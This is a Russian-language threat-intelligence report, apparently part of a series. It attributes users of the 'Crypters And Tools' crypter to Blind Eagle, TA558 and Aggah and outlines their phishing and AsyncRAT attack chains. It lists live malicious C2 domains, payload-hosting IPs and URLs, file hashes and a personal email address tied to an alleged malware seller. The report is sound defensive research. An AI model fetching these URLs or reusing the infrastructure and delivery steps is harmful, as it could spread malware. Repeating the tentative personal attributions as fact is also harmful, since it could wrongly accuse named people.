В процессе исследования группировки Blind Eagle мы наткнулись на сервер 181.71.217.114, который принадлежит привычной для Blind Eagle ASN Colombia Movil (AS 27831). Из доменов, которые связаны с этим IP-адресом большинство имели паттерн strekhostYYYY, например strekhost2024[.]duckdns[.]org. Эти домены были атрибутированы к группировке Blind Eagle компанией Zscaler, судя по публично доступному репозиторию на GitHub.

Помимо этих доменов были несколько других, а именно:

  • deadpoolstart2025.duckdns.org
  • deadpoolstart2026.duckdns.org
  • deadpoolstart2051.duckdns.org

Также на другом IP-адресе (179.14.11.213) можно найти еще несколько версий deadpoolstart с разными годами, например — deadpoolstart2035.duckdns.org.

Оказалось, что в базе данных Crypters And Tools присутствует пользователь deadpoolstart2025.

Рисунок 32. Информация из базы данных о пользователе deadpoolstart2025

Рисунок 32. Информация из базы данных о пользователе deadpoolstart2025

Одна из атак его выглядела следующим образом. 

Четырнадцатого ноября 2024 года злоумышленник отправил вредоносное письмо c поддельным отправителем в лице колумбийского производителя медицинских лекарств.

Рисунок 33. Письмо, отправленное злоумышленником

Рисунок 33. Письмо, отправленное злоумышленником

Ссылка вела на Google Drive, с которого скачивался запароленный архив FOLIO_INCONSISTENCIA_REVISION_FISCAL_CARTERA_DETALLES_DETALLES_AMPLIADOS_CODIGO_VERIFICACION_ad851874148487ff17817ca2545434453154617ff5464484171525541748594ca6544981894ff11258749565284_XML.rar (SHA-256: 5fe3f4e4ab026fbcd0b595c7b35eb3b3997cae0fc8b92728b0bd556a3ec3c092). Пароль от архива содержался в теле самого письма, а внутри находился VBS-файл (SHA-256: 937fcba2f15c795a209032a36a921fe9f53ea7a47e7295573cd1c0ebb8d9d241. В процессе запуска файл прописывался в автозагрузку, а также загружал вредоносный скрипт с ресурса paste.ee.

Полученный с paste.ee скрипт содержит закодированную в base64 команду с уже привычной $codigo. После запуска скрипт забирает данные через API с сервера Crypters And Tools — 1017.filemail.com, а также дополнительно обращается к files.catbox.moe. В итоге запускался AsyncRAT c С2-сервером, который уже принадлежит самому злоумышленнику, а не криптору — deadpoolstart2025.duckdns.org (181.71.217.114).

Мы нашли множество атак, связанных с этим пользователем, и большинство из них приходится на период с ноября 2024 года по февраль 2025-го. Во всех обнаруженных атаках злоумышленник использовал AsyncRAT. Мы обратили внимание, что mutex asyncrat в этих атаках был довольно интересным:

  • zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzNUEVOHOSTMALDITASEA 

С испанского «nuevo host, maldita sea» переводится как «новый хост, черт возьми».

Также в ходе исследования мы нашли сервер Crypters And Tools. Этот сервер использовался для взаимодействия с криптором через API. Один из пользователей, судя по найденному запросу, — некий ABBAS:

  • http://91.92.254.29/Users_API/ABBAS/file_odpxh4oq.2bf.txtn

Если внимательно рассматривать цепочку атаки, то можно найти явные корреляции с атаками Blind Eagle, к примеру IP-адреса 191.93.113.10 и 152.201.184.91, которые размещались у типичных для Blind Eagle колумбийских провайдеров. Помимо того, сама атака коррелирует с недавним описанием Check Point.

Этот пользователь присутствовал во всех версиях баз данных, которые мы отслеживали в процессе исследования Crypters And Tools.

Рисунок 34.1. Информация из базы данных о пользователе ABBAS

Рисунок 34.1. Информация из базы данных о пользователе ABBAS

Рисунок 34.2. Информация из базы данных о пользователе ABBAS

Рисунок 34.2. Информация из базы данных о пользователе ABBAS

В результате можно сказать, что в отличие от bukky101, которого нельзя точно атрибутировать к Aggah или TA558, атаки пользователей deadpoolstart2025 и ABBAS полностью соответствуют описанию Blind Eagle, включая язык, жертв, серверную инфраструктуру, поэтому мы считаем, что deadpoolstart2025 и ABBAS являются членами Blind Eagle или напрямую сотрудничают с этой группой.

TA558: Brainiac, syscore и negrocock

Как мы показали в случае с пользователем ABBAS, некоторых пользователей Crypters And Tools мы обнаружили в процессе исследования отдельных активностей группировок Blind Eagle и TA558.

Были найдены два пользователя — BrainiacMAX и syscore, которые взаимодействовали через API с инфраструктурой криптора:

  • http://91.92.254.14/Users_API/BrainiacMAX/file_ksg3fckt.hot.txt
  • http://66.70.160.254/Users_API/syscore/file_ikvt3ei1.mgv.txt

В главе «Особенности группы TA558 и ее отличия от Blind Eagle» мы привели уникальные черты, которые позволяют идентифицировать группировку. В данном случае цепочка атаки BrainiacMAX содержит классический пример ТА558 — узлы на AS-COLOCROSSING и уникальные названия:

  • http://192.3.216.148/uh.ee.uh.ee.uhuheee.doc
  • http://192.3.216.148/datingloverstartingAgain.vbs

Более того, данные отправляются на легальный взломанный SMTP-сервер в Румынии, что соответствует активности TA558 и что мы видели начиная с первого нашего исследования про эту группу.

С пользователем syscore похожая история. В атаке использовался Excel-документ с очень типичным для TA558 именем Product Inquiry466789.xls (SHA-256: 3a7d034a793a0f03dc9930446aebf326320140584eeb171909962ec7123f9e5e), который загружал RTF-шаблон со следующего URL:

  • http://51.81.235.253/66166/hd/hd.d.d.d.dddd.doC

Далее в цепочке атаки появлялся VBS-файл с очень типичным для TA558 названием:

  • http://51.81.235.253/66166/catcallingfemalecattogiveflowersgreat.gif

Оба этих пользователя были найдены в базе данных Crypters And Tools.

Рисунок 35.1. Информация из базы данных о пользователе Brainiac

Рисунок 35.1. Информация из базы данных о пользователе Brainiac

Рисунок 35.2. Информация из базы данных о пользователе syscore

Рисунок 35.2. Информация из базы данных о пользователе syscore

Как и в случае с пользователями deadpoolstart2025 и ABBAS, мы можем быть уверены, что эти конкретные пользователи относятся к публично описанной группе, но в данном случае это группа TA558. 

Аналогичным образом был найден еще один пользователь — negrocock:

  • http://94.156.65.247/Users_API/negrocock/file_mq5uppna.ldt.txt

Его атаки также содержали типичные для TA558 паттерны:

  • http://198.46.178.144/morningfiledatinglover.vbs
  • http://198.46.178.144/eveningfiledatinglover.vbs

KareemHacker

В базе Crypters And Tools присутствовал следующий пользователь:

Рисунок 36. Информация из базы данных о пользователе KareemHacker

Рисунок 36. Информация из базы данных о пользователе KareemHacker

Kareem.Hacker — это хакер, предположительно из Марокко, который судя по данным сайта mirror-h (сайт, который собирает данные о дефейсах) был причастен к дефейсу по крайней мере 538 сайтов, а по данным zone-h — 1671. Помимо этого, у него есть свой GitHub-аккаунт, аккаунт X и несколько YouTube-каналов, на одном из которых он под музыку пишет текст на арабском языке и показывает сайты, которые он задефейсил. На данный момент его аккаунт в X заблокирован за нарушение правил, так как некоторые пользователи жаловались, что он взламывал их сайты.

Рисунок 37. GitHub-аккаунт Kareem.Hacker

Рисунок 37. GitHub-аккаунт Kareem.Hacker

Стоит отметить, что Kareem Hacker — это, может быть, редкое, но легальное сочетание имени и фамилии, а также что мы не можем в данном случае быть уверены, что пользователь Crypters And Tools и дефейсер Kareem.Hacker — это один человек.

HeadMaster

Во время исследования Crypters And Tools мы исследовали различные маркетплейсы, сайты и прочие ресурсы с продажами этого криптора. Один из таких ресурсов это nitrosoftwares[.]com, где продаются различные эксплойты, крипторы, логгеры, криптоклипперы и т. п.

Рисунок 38. Сайт по продаже различного ПО

Рисунок 38. Сайт по продаже различного ПО

Рисунок 39. Контакты на сайте

Рисунок 39. Контакты на сайте

В базе данных Crypters And Tools мы обнаружили следующего пользователя.

Рисунок 40. Информация из базы данных о пользователе headmaster

Рисунок 40. Информация из базы данных о пользователе headmaster

Обратите внимание на связь Discord-аккаунта2 HeadMaster и адреса jkbest22@gmail.com (рис. 39). В публичных утечках мы нашли пароли, связанные с этим адресом, один из которых совпадает с паролем пользователя headmaster на рис. 40 (скрыт на рисунке).

То есть злоумышленник использовал однообразные пароли на многих почтовых ящиках и в различных сервисах, включая вышеупомянутый сайт по продаже вредоносного ПО. Помимо этого, часть многочисленных почтовых ящиков злоумышленника подверглись утечкам, которые включали почтовые адреса, пароли, никнеймы, а также IP-адреса, все из которых были из Пакистана — предположительной страны происхождения группы Aggah. Тем не менее установить однозначную связь между HeadMaster и Aggah пока не удалось.

2Платформа Discord заблокирована на территории России.

Остальные пользователи

Очередной найденный пользователь — HURRICANE.

Рисунок 41. Информация из базы данных о пользователе HURRICANE

Рисунок 41. Информация из базы данных о пользователе HURRICANE

Этот пользователь, также как и многие другие, был найден через API-запросы к инфраструктуре Crypters And Tools, которые он делал во время своих атак:

  • http://94.156.65.247/Users_API/HURRICANE/file_lfhsdrdp.5db.txt
Рисунок 42. Пример письма пользователя Crypters And Tools — HURRICANE

Рисунок 42. Пример письма пользователя Crypters And Tools — HURRICANE

Имена документов были похожи на используемые TA558, но дальнейшая цепочка атаки отличалась.

Помимо этого, мы видели еще несколько URL с пользователями, относящимися к Crypters And Tools, но пока не располагаем по ним дополнительными данными:

  • http://91.92.254.14/Users_API/Just1ne/file_1hsfgryb.he3.txt
  • http://91.92.254.14/Users_API/gavrels/file_ycm2xqby.heg.txty
  • https://91.92.254.29/Users_API/Ws/file_wuey5ekz.pcq.txt

Выводы

Исследователи в своих отчетах часто указывают инфраструктуру Crypters And Tools в качестве индикаторов описанных групп, но это не всегда правильно. В первой части нашего исследования мы показали устройство криптора, а также указали часть сетевых и файловых индикаторов, которые принадлежат Crypters And Tools. В этой части мы показали, какие группы использовали этот криптор, а также их связи друг с другом.

Помимо этого, мы проанализировали некоторых активных пользователей криптора и точно установили, что часть пользователей является членами группировок Blind Eagle и TA558. А также обнаружили некоторых других пользователей, например Bukky101, который совместно с другим пользователем за сутки отправил как минимум 60 300 вредоносных писем по всему миру.

Кроме того, рассмотренные новые атаки группировки Aggah показывают, что, несмотря на затишье в 2022 году, ее активность продолжается в 2024 и 2025 годах. Ключевые методы, такие как использование serverless-инфраструктуры (например, Blosgspot и Bitbucket), остаются неизменной частью цепочки заражения. Однако, наряду с этим, наблюдается появление новых вредоносных нагрузок, таких как Rhadamanthys и XWorm.

Список статей с упоминанием рассматриваемых группировок и криптора

Aggah

  • https://malware.news/t/unknown-ttps-of-remcos-rat/80082
  • https://yoroi.company/research/serverless-infostealer-delivered-in-est-european-countries/
  • https://web.archive.org/web/20240106015245/https:/marcoramilli.com/2022/11/21/is-hagga-threat-actor-abusing-fsociety-framework/
  • https://ti.qianxin.com/blog/articles/Subgroup-of-Blind-Eagle-Analysis-of-Recent-Attack-Activities-from-Hagga-Group-EN/

TA558

  • https://www.metabaseq.com/threat/ta588/
  • https://www.forcepoint.com/blog/x-labs/url-shortener-microsoft-word-remcos-rat-trojan
  • https://cyble.com/blog/threat-actor-employs-powershell-backed-steganography-in-recent-spam-campaigns/
  • https://www.seqrite.com/blog/steganographic-campaign-distributing-malware/
  • https://www.trellix.com/blogs/research/unmasking-the-hidden-threat-inside-a-sophisticated-excel-based-attack-delivering-fileless-remcos-rat/
  • https://www.cyfirma.com/research/exploiting-document-templates-stego-campaign-deploying-remcos-rat-and-agent-tesla/

Blind Eagle

  • https://blogs.blackberry.com/en/2023/02/blind-eagle-apt-c-36-targets-colombia
  • https://www.esentire.com/blog/blind-eagles-north-american-journey
  • https://mp.weixin.qq.com/s/DDCCjhBjUTa7Ia4Hggsa1A
  • https://any.run/cybersecurity-blog/steganography-in-malware-attacks/

PhantomControl

  • https://www.esentire.com/blog/phantomcontrol-returns-with-ande-loader-and-swaetrat

Статьи с фигурированием Crypters And Tools без атрибутирования к каким-либо группировкам

  • https://somedieyoungzz.github.io/posts/stego-camp/
  • https://asec.ahnlab.com/en/65111/
  • https://www.mcafee.com/blogs/other-blogs/mcafee-labs/agent-teslas-unique-approach-vbs-and-steganography-for-delivery-and-intrusion/
  • https://www.zscaler.com/blogs/security-research/threat-actors-exploit-cve-2017-11882-deliver-agent-tesla
  • https://www.fortinet.com/blog/threat-research/python-info-stealer-malicious-excel-document
  • https://blog.itochuci.co.jp/entry/2024/04/16/163014
  • https://medium.com/@b.magnezi/malware-analysis-xworm-80b3bbb072fb